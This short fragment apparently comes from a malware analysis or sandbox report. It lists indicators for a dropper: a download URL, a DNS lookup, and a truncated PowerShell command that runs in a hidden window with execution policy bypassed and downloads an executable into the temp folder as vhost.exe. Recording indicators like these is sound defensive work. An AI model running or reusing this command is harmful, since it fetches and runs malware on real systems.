Technical Information
- http://www.styrenpack.com/helptelsa/maintelsa.exe as %temp + %\vhost.exe
- DNS ASK st###npack.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden -noprofile -noexit (New-Object System.Net.WebClient).DownloadFile('http://www.styrenpack.com/helptelsa/maintelsa.exe', $env:TEMP + '\vhost.exe'); (Ne...' (with hidden window)